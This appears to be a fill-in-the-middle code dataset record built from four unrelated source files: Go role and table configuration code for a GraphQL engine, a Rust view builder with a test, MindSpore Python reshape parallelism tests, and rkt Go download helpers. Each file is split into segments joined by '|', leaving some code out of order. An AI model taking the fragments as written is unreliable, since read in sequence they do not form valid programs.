func (sg *SuperGraph) initConfig() error {
c := sg.conf
for k, v := range c.Inflections {
flect.AddPlural(k, v)
}
// Variables: Validate and sanitize
for k, v := range c.Vars {
c.Vars[k] = sanitizeVars(v)
}
// Tables: Validate and sanitize
tm := make(map[string]struct{})
for i := 0; i < len(c.Tables); i++ {
t := &c.Tables[i]
t.Name = flect.Pluralize(strings.ToLower(t.Name))
if _, ok := tm[t.Name]; ok {
sg.conf.Tables = append(c.Tables[:i], c.Tables[i+1:]...)
sg.log.Printf("WRN duplicate table found: %s", t.Name)
}
tm[t.Name] = struct{}{}
t.Table = flect.Pluralize(strings.ToLower(t.Table))
}
sg.roles = make(map[string]*Role)
for i := 0; i < len(c.Roles); i++ {
role := &c.Roles[i]
role.Name = sanitize(role.Name)
if _, ok := sg.roles[role.Name]; ok {
c.Roles = append(c.Roles[:i], c.Roles[i+1:]...)
sg.log.Printf("WRN duplicate role found: %s", role.Name)
}
role.Match = sanitize(role.Match)
role.tm = make(map[string]*RoleTable)
for n, table := range role.Tables {
role.tm[table.Name] = &role.Tables[n]
}
sg.roles[role.Name] = role
}
// If user role not defined then create it
if _, ok := sg.roles["user"]; !ok {
ur := Role{
Name: "user",
tm: make(map[string]*RoleTable),
}
c.Roles = append(c.Roles, ur)
sg.roles["user"] = &ur
}
// If anon role is not defined and DefaultBlock is not then then create it
if _, ok := sg.roles["anon"]; !ok && !c.DefaultBlock {
ur := Role{
Name: "anon",
tm: make(map[string]*RoleTable),
}
c.Roles = append(c.Roles, ur)
sg.roles["anon"] = &ur
}
// Roles: validate and sanitize
c.RolesQuery = sanitizeVars(c.RolesQuery)
if len(c.RolesQuery) == 0 {
sg.log.Printf("WRN roles_query not defined: attribute based access control disabled")
}
_, userExists := sg.roles["user"]
_, sg.anonExists = sg.roles["anon"]
sg.abacEnabled = userExists && len(c.RolesQuery) != 0
return nil
}
func getDBTableAliases(c *Config) map[string][]string {
m := make(map[string][]string, len(c.Tables))
for i := range c.Tables {
t := c.Tables[i]
if len(t.Table) == 0 || len(t.Columns) != 0 {
continue
}
m[t.Table] = append(m[t.Table], t.Name)
}
return m
}
func addTables(c *Config, di *psql.DBInfo) error {
for _, t := range c.Tables {
if len(t.Table) == 0 || len(t.Columns) == 0 {
continue
}
if err := addTable(di, t.Columns, t); err != nil {
return err
}
}
return nil
}
func addTable(di *psql.DBInfo, cols []Column, t Table) error {
bc, ok := di.GetColumn(t.Table, t.Name)
if !ok {
return fmt.Errorf(
"Column '%s' not found on table '%s'",
t.Name, t.Table)
}
if bc.Type != "json" && bc.Type != "jsonb" {
return fmt.Errorf(
"Column '%s' in table '%s' is of type '%s'. Only JSON or JSONB is valid",
t.Name, t.Table, bc.Type)
}
table := psql.DBTable{
Name: t.Name,
Key: strings.ToLower(t.Name),
Type: bc.Type,
}
columns := make([]psql.DBColumn, 0, len(cols))
for i := range cols {
c := cols[i]
columns = append(columns, psql.DBColumn{
Name: c.Name,
Key: strings.ToLower(c.Name),
Type: c.Type,
})
}
di.AddTable(table, columns)
bc.FKeyTable = t.Name
return nil
}
func addForeignKeys(c *Config, di *psql.DBInfo) error {
for _, t := range c.Tables {
for _, c := range t.Columns {
if len(c.ForeignKey) == 0 {
continue
}
if err := addForeignKey(di, c, t); err != nil {
return err
}
}
}
return nil
}
func addForeignKey(di *psql.DBInfo, c Column, t Table) error {
c1, ok := di.GetColumn(t.Name, c.Name)
if !ok {
return fmt.Errorf(
"Invalid table '%s' or column '%s' in Config",
t.Name, c.Name)
}
v := strings.SplitN(c.ForeignKey, ".", 2)
if len(v) != 2 |
fkt, fkc := v[0], v[1]
c2, ok := di.GetColumn(fkt, fkc)
if !ok {
return fmt.Errorf(
"Invalid foreign_key in Config for table '%s' and column '%s",
t.Name, c.Name)
}
c1.FKeyTable = fkt
c1.FKeyColID = []int16{c2.ID}
return nil
}
func addRoles(c *Config, qc *qcode.Compiler) error {
for _, r := range c.Roles {
for _, t := range r.Tables {
if err := addRole(qc, r, t); err != nil {
return err
}
}
}
return nil
}
func addRole(qc *qcode.Compiler, r Role, t RoleTable) error {
blockFilter := []string{"false"}
query := qcode.QueryConfig{
Limit: t.Query.Limit,
Filters: t.Query.Filters,
Columns: t.Query.Columns,
DisableFunctions: t.Query.DisableFunctions,
}
if t.Query.Block {
query.Filters = blockFilter
}
insert := qcode.InsertConfig{
Filters: t.Insert.Filters,
Columns: t.Insert.Columns,
Presets: t.Insert.Presets,
}
if t.Insert.Block {
insert.Filters = blockFilter
}
update := qcode.UpdateConfig{
Filters: t.Update.Filters,
Columns: t.Update.Columns,
Presets: t.Update.Presets,
}
if t.Update.Block {
update.Filters = blockFilter
}
delete := qcode.DeleteConfig{
Filters: t.Delete.Filters,
Columns: t.Delete.Columns,
}
if t.Delete.Block {
delete.Filters = blockFilter
}
return qc.AddRole(r.Name, t.Name, qcode.TRConfig{
Query: query,
Insert: insert,
Update: update,
Delete: delete,
})
}
func (r *Role) GetTable(name string) *RoleTable {
return r.tm[name]
}
func sanitize(value string) string {
return strings.ToLower(strings.TrimSpace(value))
}
var (
varRe1 = regexp.MustCompile(`(?mi)\$([a-zA-Z0-9_.]+)`)
varRe2 = regexp.MustCompile(`\{\{([a-zA-Z0-9_.]+)\}\}`)
)
func sanitizeVars(s string) string {
s0 := varRe1.ReplaceAllString(s, `{{$1}}`)
s1 := strings.Map(func(r rune) rune {
if unicode.IsSpace(r) {
return ' '
}
return r
}, s0)
return varRe2.ReplaceAllStringFunc(s1, func(m string) string {
return strings.ToLower(m)
})
}
| {
return fmt.Errorf(
"Invalid foreign_key in Config for table '%s' and column '%s",
t.Name, c.Name)
} |
main.rs | use super::get_forest;
use super::get_visitors;
use crate::model;
pub fn main(
configuration: model::Configuration,
type_: model::Type<()>,
paths: Vec<model::Path>,
) -> model::Result<model::View> |
#[cfg(test)]
mod tests {
use super::*;
use std::array;
#[test]
fn handles() {
let actual = main(
model::Configuration {
template: model::Template::Default {
initializer: Some(syn::parse_str("abc").unwrap()),
identifiers: true,
},
debug: true,
..model::stubs::configuration()
},
model::Type {
name: quote::format_ident!("Asset"),
..model::stubs::type_()
},
vec![model::Path {
relative: vec![String::from('b')],
absolute: String::from("/a/b"),
}],
);
let actual = actual.unwrap();
let expected = model::View {
type_: quote::format_ident!("Asset"),
visitors: vec![
model::Visitor::Array(model::Initializer::Macro(syn::parse_str("abc").unwrap())),
model::Visitor::Identifiers,
],
forest: array::IntoIter::new([(
String::from('b'),
model::Tree::File(model::File {
identifier: quote::format_ident!("r#B"),
index: 0,
relative_path: String::from('b'),
absolute_path: String::from("/a/b"),
}),
)])
.collect(),
debug: true,
};
assert_eq!(actual, expected);
}
}
| {
let visitors = get_visitors::main(configuration.template, type_.structure)?;
let forest = get_forest::main(paths)?;
Ok(model::View {
type_: type_.name,
visitors,
forest,
debug: configuration.debug,
})
} |
test_reshape.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mindspore.train import Model, ParallelMode
from mindspore.nn.loss import SoftmaxCrossEntropyWithLogits
from mindspore.nn.optim.momentum import Momentum
from mindspore import Tensor
import mindspore as ms
import numpy as np
from mindspore.ops import operations as P
import mindspore.nn as nn
from mindspore.common.parameter import Parameter
from tests.dataset_mock import MindData
from mindspore import context
from tests.ut.python.ops.test_math_ops import VirtualLoss
from mindspore.common.api import _executor
from mindspore.ops import composite as C
from mindspore.ops.operations.comm_ops import _VirtualDataset
from mindspore.ops import functional as F
from mindspore.common.parameter import ParameterTuple
from mindspore.common import dtype as mstype
from mindspore.parallel import set_algo_parameters
context.set_context(mode=context.GRAPH_MODE)
context.reset_auto_parallel_context()
class Dataset(MindData):
def __init__(self, predict, label, length=3, input_num=2):
super(Dataset, self).__init__(size=length)
self.predict = predict
self.label = label
self.index = 0
self.length = length
self.input_num = input_num
def __iter__(self):
return self
def __next__(self):
if self.index >= self.length:
raise StopIteration
self.index += 1
if self.input_num == 2:
return self.predict, self.label
else:
return self.predict,
def reset(self):
self.index = 0
class ReshapeNet(nn.Cell):
def __init__(self, strategy0, strategy1, strategy2):
super(ReshapeNet, self).__init__()
self.relu = P.ReLU().set_strategy(strategy0)
self.reshape = P.Reshape().set_strategy(strategy1)
self.matmul = P.MatMul().set_strategy(strategy2)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
def construct(self, x):
x = self.relu(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
return x
def reshape_net(strategy0, strategy1, strategy2):
return ReshapeNet(strategy0=strategy0, strategy1=strategy1, strategy2=strategy2)
def reshape_common(parallel_mode, strategy0, strategy1, strategy2, strategy_loss):
batch_size = 32
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
predict = Tensor(np.ones([32, 512, 7, 7]), dtype=ms.float32)
label = Tensor(np.ones([32]), dtype=ms.int32)
dataset = Dataset(predict, label, 2)
net = reshape_net(strategy0, strategy1, strategy2)
loss = SoftmaxCrossEntropyWithLogits(is_grad=False, sparse=True)
loss.softmax_cross_entropy.set_strategy(strategy_loss)
loss.one_hot.set_strategy(((8,1), (), ()))
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss, opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
def test_reshape1():
strategy0 = ((8, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape1_strategy_1():
strategy0 = ((8, 1, 1, 1), )
strategy1 = ((8, 1, 1, 1), )
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
try:
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
except:
pass
def test_reshape1_strategy_2():
strategy0 = ((8, 1, 1, 1), )
strategy1 = ((8, 1, 1, 1), )
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
try:
reshape_common(ParallelMode.AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
except:
pass
def test_reshape2():
strategy0 = ((8, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape3():
strategy0 = ((2, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape4():
strategy0 = ((1, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape5():
strategy0 = ((2, 1, 1, 1), )
strategy1 = None
strategy2 = ((1, 8), (8, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape_auto():
strategy0 = None
strategy1 = None
strategy2 = None
strategy_loss = None
reshape_common(ParallelMode.AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
class NetWithLoss(nn.Cell):
def __init__(self, network):
super(NetWithLoss, self).__init__()
self.loss = VirtualLoss()
self.network = network
def construct(self, x):
predict = self.network(x)
return self.loss(predict)
class GradWrap(nn.Cell):
def __init__(self, network):
super(GradWrap, self).__init__()
self.network = network
def construct(self, x):
return C.grad_all(self.network)(x)
class ReshapeNet1(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet1, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.reshape2 = P.Reshape()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
x = self.reshape2(x, (256 * 256,))
return x
class ReshapeNet2(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet2, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.reshape2 = P.Reshape()
self.reduce_sum = P.ReduceSum(keep_dims=True)
self.reshape3 = P.Reshape()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
x = self.reshape2(x, (256 * 256,))
x = self.reduce_sum(x, -1)
x = self.reshape3(x, ())
return x
class ReshapeNet3(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet3, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.reshape2 = P.Reshape()
self.reduce_sum = P.ReduceSum(keep_dims=False)
self.reshape3 = P.Reshape()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
x = self.reshape2(x, (256 * 256,))
x = self.reduce_sum(x, -1)
x = self.reshape3(x, (1, 1))
return x
class ReshapeNet4(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet4, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.reshape2 = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
w = self.reshape2(self.matmul_weight, (25088, 256))
x = self.matmul(x, w)
return x
class ReshapeNet5(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet5, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul1 = P.MatMul().set_strategy(strategy0)
self.matmul1_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.matmul2 = P.MatMul().set_strategy(strategy0)
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
matmul1_o = self.matmul1(x, self.matmul1_weight)
matmul2_o = self.matmul2(matmul1_o, x)
return matmul2_o
class ReshapeNet6(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet6, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul1_1 = P.MatMul().set_strategy(strategy0)
self.matmul1_2 = P.MatMul().set_strategy(strategy0)
self.matmul1_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.matmul2 = P.MatMul().set_strategy(strategy0)
self.add = P.TensorAdd()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
matmul1_1_o = self.matmul1_1(x, self.matmul1_weight)
matmul1_2_o = self.matmul1_2(x, self.matmul1_weight)
matmul1_o = self.add(matmul1_1_o, matmul1_2_o)
matmul2_o = self.matmul2(matmul1_o, x)
return matmul2_o
def reshape_net2(backbone):
batch_size = 16
device_num = 16
context.set_auto_parallel_context(device_num=device_num, global_rank=0)
input = Tensor(np.ones([batch_size * device_num, 512, 7, 7]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(backbone))
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel")
_executor.compile(net, input)
def test_reshape_net1_1():
reshape_net2(ReshapeNet1(((1, 8), (8, 1))))
def test_reshape_net1_2():
reshape_net2(ReshapeNet1(((1, 8), (8, 2))))
def test_reshape_net2_1():
reshape_net2(ReshapeNet2(((1, 8), (8, 1))))
def test_reshape_net2_2():
reshape_net2(ReshapeNet2(((1, 8), (8, 2))))
def test_reshape_net3_1():
reshape_net2(ReshapeNet3(((1, 8), (8, 1))))
def test_reshape_net3_2():
reshape_net2(ReshapeNet3(((1, 8), (8, 2))))
def test_reshape_net4_1():
try:
reshape_net2(ReshapeNet4(((1, 8), (8, 1))))
except:
pass
def test_reshape_net4_2():
try:
reshape_net2(ReshapeNet4(((1, 8), (8, 2))))
except:
pass
def test_reshape_net5_1():
reshape_net2(ReshapeNet5(((1, 8), (8, 1))))
def test_reshape_net5_2():
reshape_net2(ReshapeNet5(((1, 8), (8, 2))))
def test_reshape_net6_1():
reshape_net2(ReshapeNet6(((1, 8), (8, 1))))
def test_reshape_net6_2():
reshape_net2(ReshapeNet6(((1, 8), (8, 2))))
class TrainOneStepCell(nn.Cell):
"""
Network training package class.
Append an optimizer to the training network after that the construct function
can be called to create the backward graph.
Args:
network (Cell): The training network.
optimizer (Cell): Optimizer for updating the weights.
sens (Number): The adjust parameter. Default: 1.0.
Examples:
>>> net = Net()
>>> loss_fn = nn.SoftmaxCrossEntropyWithLogits()
>>> optim = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
>>> loss_net = WithLossCell(net, loss_fn)
>>> train_net = TrainOneStepCell(loss_net, optim)
"""
def __init__(self, network, optimizer, sens=1.0):
super(TrainOneStepCell, self).__init__(auto_prefix=False)
self.network = network
self.network.add_flags(defer_inline=True)
self.weights = ParameterTuple(network.trainable_params())
self.optimizer = optimizer
self.grad = C.GradOperation('grad',
get_by_list=True,
sens_param=True)
self.sens = sens
def construct(self, data):
weights = self.weights
loss = self.network(data)
sens = P.Fill()(P.DType()(loss), P.Shape()(loss), self.sens)
grads = self.grad(self.network, weights)(data, sens)
return F.depend(loss, self.optimizer(grads))
def reshape_common2(parallel_mode, net):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
predict = Tensor(np.ones([batch_size, 512, 7, 7]), dtype=ms.float32)
label = Tensor(np.ones([batch_size]), dtype=ms.int32)
dataset = Dataset(predict, label, 2, input_num=1)
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=16)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
train_net = TrainOneStepCell(net, opt).set_train()
model = Model(train_net)
model.train(epoch_size, dataset, dataset_sink_mode=False)
def test_reshape_common2_0():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet1(((1, 8), (8, 1))))
def test_reshape_common2_1():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet1(((1, 8), (8, 2))))
def test_reshape_common2_2():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet2(((1, 8), (8, 1))))
def test_reshape_common2_3():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet2(((1, 8), (8, 2))))
def test_reshape_common2_4():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet3(((1, 8), (8, 1))))
def test_reshape_common2_5():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet3(((1, 8), (8, 2))))
class BatchNormReshapeNet(nn.Cell):
def __init__(self):
super(BatchNormReshapeNet, self).__init__()
self.vd = P._VirtualDataset()
self.batch_norm = nn.BatchNorm1d(512, affine=False)
self.reshape = P.Reshape()
self.prelu = nn.PReLU(channel=256)
def construct(self, x):
x = self.vd(x)
x = self.batch_norm(x)
x = self.reshape(x, (512, 256))
x = self.prelu(x)
return x
def test_batchnorm_reshape_train():
batch_size = 16
device_num = 16
context.set_auto_parallel_context(device_num=device_num, global_rank=0)
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel")
input = Tensor(np.ones([batch_size * device_num, 512]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(BatchNormReshapeNet()))
_executor.compile(net, input)
def bn_with_initialize(out_channels):
bn = nn.BatchNorm2d(out_channels, momentum=0.3, eps=1e-5).add_flags_recursive(fp32=True)
return bn
def fc_with_initialize(input_channels, out_channels):
return nn.Dense(input_channels, out_channels).add_flags_recursive(fp16=True)
class BNReshapeDenseBNNet(nn.Cell):
def __init__(self):
super(BNReshapeDenseBNNet, self).__init__()
self.batch_norm = bn_with_initialize(2)
self.reshape = P.Reshape()
self.cast = P.Cast()
self.batch_norm2 = nn.BatchNorm1d(512, affine=False)
self.fc = fc_with_initialize(2 * 32 * 32, 512)
def construct(self, x):
x = self.batch_norm(x)
x = self.reshape(x, (16, 2*32*32))
x = self.fc(x)
x = self.batch_norm2(x)
return x
def test_bn_reshape_dense_bn_train():
batch_size = 16
device_num = 16
context.set_auto_parallel_context(device_num=device_num, global_rank=0)
input = Tensor(np.ones([batch_size, 2, 32, 32]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(BNReshapeDenseBNNet()))
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel")
_executor.compile(net, input)
class ParallelReduceMeanNet(nn.Cell):
def __init__(self, conv_in_channel, conv_out_channel,
reducemean_keep_dims=False, reducemean_axis=-1, strategy=None):
super().__init__()
self.conv = nn.Conv2d(in_channels=conv_in_channel, out_channels=conv_out_channel,
kernel_size=1, stride=1, pad_mode='valid', has_bias=True,
weight_init='ones', bias_init='ones')
self.reduce_mean = P.ReduceMean(keep_dims=reducemean_keep_dims)
self.flat = nn.Flatten()
self.reducemean_axis = reducemean_axis
if strategy is not None:
self.reduce_mean.set_strategy(strategy)
def construct(self, inputs):
x = self.conv(inputs)
x = self.reduce_mean(x, self.reducemean_axis)
x = self.flat(x)
return x
class CrossEntropyLoss(nn.Cell):
def __init__(self, reduction='mean'):
super(CrossEntropyLoss, self).__init__()
self.reduce_mean = P.ReduceMean()
self.cross_entropy = SoftmaxCrossEntropyWithLogits()
self.reduction = reduction
def construct(self, logits, label):
loss = self.cross_entropy(logits, label)
if self.reduction == 'mean':
loss = self.reduce_mean(loss, (-1,))
return loss
def test_flatten_reshape(parallel_mode="auto_parallel"):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
net = ParallelReduceMeanNet(conv_in_channel=3, conv_out_channel=64, reducemean_axis=(2, 3), strategy=((4, 2, 1, 1),))
loss = CrossEntropyLoss()
predict = Tensor(np.ones([batch_size, 3, 32, 32]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 64]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss_fn = loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
def test_flatten_reshape2(parallel_mode="auto_parallel"):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
set_algo_parameters(fully_use_devices=False)
net = ParallelReduceMeanNet(conv_in_channel=3, conv_out_channel=64, reducemean_axis=(2, 3), strategy=((4, 1, 1, 1),))
loss = CrossEntropyLoss()
predict = Tensor(np.ones([batch_size, 3, 32, 32]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 64]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss_fn = loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
class ParallelReshapeNet(nn.Cell):
def __init__(self, dense_in_channel, dense_out_channel, shape, strategy=None):
super().__init__()
self.flat = nn.Flatten()
self.dense = nn.Dense(in_channels=dense_in_channel,
out_channels=dense_out_channel,
weight_init='ones',
bias_init='ones',
has_bias=True)
self.reshape = P.Reshape()
self.shape = shape
self.reshape.set_strategy(strategy)
def construct(self, inputs):
x = self.flat(inputs)
x = self.dense(x)
x = self.reshape(x, self.shape)
return x
# the shape of input and output of reshape is the same
# reshape is optimized before step_parallel
def test_flatten_reshape3(parallel_mode="auto_parallel"):
|
class CrossEntropyLoss2(nn.Cell):
def __init__(self, reduction='mean'):
super(CrossEntropyLoss2, self).__init__()
self.cross_entropy = SoftmaxCrossEntropyWithLogits(reduction=reduction)
def construct(self, logits, label):
loss = self.cross_entropy(logits, label)
return loss
def test_flatten_reshape4(parallel_mode="semi_auto_parallel"):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
set_algo_parameters(fully_use_devices=False)
net = ParallelReduceMeanNet(conv_in_channel=3, conv_out_channel=64, reducemean_keep_dims=True, strategy=((4, 1, 1, 1),))
loss = CrossEntropyLoss2()
predict = Tensor(np.ones([batch_size, 3, 32, 32]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 2048]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss_fn=loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
| batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
set_algo_parameters(fully_use_devices=False)
net = ParallelReshapeNet(dense_in_channel=2048, dense_out_channel=1000, shape=(128, 1000), strategy=((16, 1),))
loss = CrossEntropyLoss()
predict = Tensor(np.ones([batch_size, 1, 2, 1024]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 1000]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss_fn = loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False) |
io.go | // Copyright 2015 The rkt Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package image
import (
"crypto/sha512"
"errors"
"fmt"
"io"
"net/http"
"os"
"time"
"github.com/hashicorp/errwrap"
"github.com/rkt/rkt/pkg/lock"
"github.com/rkt/rkt/store/imagestore"
"github.com/coreos/ioprogress"
)
// writeSyncer is an interface that wraps io.Writer and a Sync method.
type writeSyncer interface {
io.Writer
Sync() error
}
// readSeekCloser is an interface that wraps io.ReadSeeker and
// io.Closer
type readSeekCloser interface {
io.ReadSeeker
io.Closer
}
type nopReadSeekCloser struct {
io.ReadSeeker
}
func (nopReadSeekCloser) Close() error { return nil }
// NopReadSeekCloser wraps the given ReadSeeker
// and returns one that does nothing when Close() is being invoked.
func NopReadSeekCloser(rs io.ReadSeeker) readSeekCloser {
return nopReadSeekCloser{rs}
}
// getIoProgressReader returns a reader that wraps the HTTP response
// body, so it prints a pretty progress bar when reading data from it.
func getIoProgressReader(label string, res *http.Response) io.Reader {
prefix := "Downloading " + label
fmtBytesSize := 18
barSize := int64(80 - len(prefix) - fmtBytesSize)
bar := ioprogress.DrawTextFormatBarForW(barSize, os.Stderr)
fmtfunc := func(progress, total int64) string {
// Content-Length is set to -1 when unknown.
if total == -1 {
return fmt.Sprintf(
"%s: %v of an unknown total size",
prefix,
ioprogress.ByteUnitStr(progress),
)
}
return fmt.Sprintf(
"%s: %s %s",
prefix,
bar(progress, total),
ioprogress.DrawTextFormatBytes(progress, total),
)
}
return &ioprogress.Reader{
Reader: res.Body,
Size: res.ContentLength,
DrawFunc: ioprogress.DrawTerminalf(os.Stderr, fmtfunc),
DrawInterval: time.Second,
}
}
// removeOnClose is a wrapper around os.File that removes the file
// when closing it. removeOnClose implements a readSeekCloser
// interface.
type removeOnClose struct { |
func (f *removeOnClose) Read(p []byte) (int, error) {
return f.File.Read(p)
}
func (f *removeOnClose) Seek(offset int64, whence int) (int64, error) {
return f.File.Seek(offset, whence)
}
// Close closes the file and then removes it from disk. No error is
// returned if the file did not exist at the point of removal.
func (f *removeOnClose) Close() error {
if f == nil || f.File == nil {
return nil
}
name := f.File.Name()
if err := f.File.Close(); err != nil {
return err
}
if err := os.Remove(name); err != nil && !os.IsNotExist(err) {
return err
}
return nil
}
// getTmpROC returns a removeOnClose instance wrapping a temporary
// file provided by the passed store. The actual file name is based on
// a hash of the passed path.
func getTmpROC(s *imagestore.Store, path string) (*removeOnClose, error) {
h := sha512.New()
h.Write([]byte(path))
pathHash := s.HashToKey(h)
tmp, err := s.TmpNamedFile(pathHash)
if err != nil {
return nil, errwrap.Wrap(errors.New("error setting up temporary file"), err)
}
// let's lock the file to avoid concurrent writes to the temporary file, it
// will go away when removing the temp file
_, err = lock.TryExclusiveLock(tmp.Name(), lock.RegFile)
if err != nil {
if err != lock.ErrLocked {
return nil, errwrap.Wrap(errors.New("failed to lock temporary file"), err)
}
log.Printf("another rkt instance is downloading this file, waiting...")
_, err = lock.ExclusiveLock(tmp.Name(), lock.RegFile)
if err != nil {
return nil, errwrap.Wrap(errors.New("failed to lock temporary file"), err)
}
}
return &removeOnClose{File: tmp}, nil
